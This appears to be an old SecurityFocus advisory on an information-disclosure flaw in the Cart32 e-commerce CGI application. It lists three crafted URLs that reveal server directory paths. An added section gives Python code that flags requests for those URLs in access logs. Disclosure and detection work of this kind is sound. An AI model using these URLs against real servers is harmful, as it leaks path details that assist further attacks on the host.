source : https://www.securityfocus.com/bid/1932/info

Cart32 is a shopping cart application for e-commerce enabled sites.

Cart32 contains a vulnerability that reveals server information. Requesting a specially crafted URL through the CGI application reveals the physical path to the web root as well as to the Windows and Program Files directories.

Successful exploitation of this vulnerability could assist in further attacks against the victim host.

http://target/cgi-bin/cart32.exe/error

http://target/cgi-bin/c32web.exe/ShowAdminDir

http://target/cgi-bin/c32web.exe/CheckError?error=53
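
Added example, not part of the original advisory: Python detection logic that flags requests for the three URLs above in web server access logs. The NCSA common log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# PATH_INFO values named in the advisory, keyed by CGI binary (lowercased).
DISCLOSURE_ENDPOINTS = {
    "cart32.exe": {"error"},
    "c32web.exe": {"showadmindir", "checkerror"},
}

# Assumed NCSA common log format: client ... "METHOD target PROTOCOL" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:[A-Z]+) (\S+) [^"]*" (\d{3})')

def classify(target):
    """Return 'binary/action' if the request target is a disclosure URL, else None."""
    # Drop the query string, decode percent-escapes, and lowercase,
    # because paths on a Windows web server are case-insensitive.
    path = unquote(urlsplit(target).path).replace("\\", "/").lower()
    segments = [s for s in path.split("/") if s]
    for i, seg in enumerate(segments[:-1]):
        if segments[i + 1] in DISCLOSURE_ENDPOINTS.get(seg, ()):
            return f"{seg}/{segments[i + 1]}"
    return None

def scan(lines):
    """Return (client, endpoint, status) for every log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, target, status = m.groups()
        endpoint = classify(target)
        if endpoint:
            hits.append((client, endpoint, int(status)))
    return hits

# Constructed sample log lines using documentation addresses; the last
# request path is a hypothetical benign one.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2001:10:00:00 +0000] "GET /cgi-bin/cart32.exe/error HTTP/1.0" 200 812',
    '192.0.2.10 - - [01/Jan/2001:10:00:02 +0000] "GET /cgi-bin/C32WEB.EXE/ShowAdminDir HTTP/1.0" 200 640',
    '198.51.100.7 - - [01/Jan/2001:10:05:00 +0000] "GET /cgi-bin/c32web.exe/Check%45rror?error=53 HTTP/1.0" 200 701',
    '203.0.113.5 - - [01/Jan/2001:10:06:00 +0000] "GET /cgi-bin/cart32.exe/example-storefront HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for client, endpoint, status in scan(SAMPLE_LOG):
        print(f"{client} requested {endpoint} (HTTP {status})")
```

The status code is kept in each hit so that responses that were actually served can be separated from requests against hosts where the binary is absent.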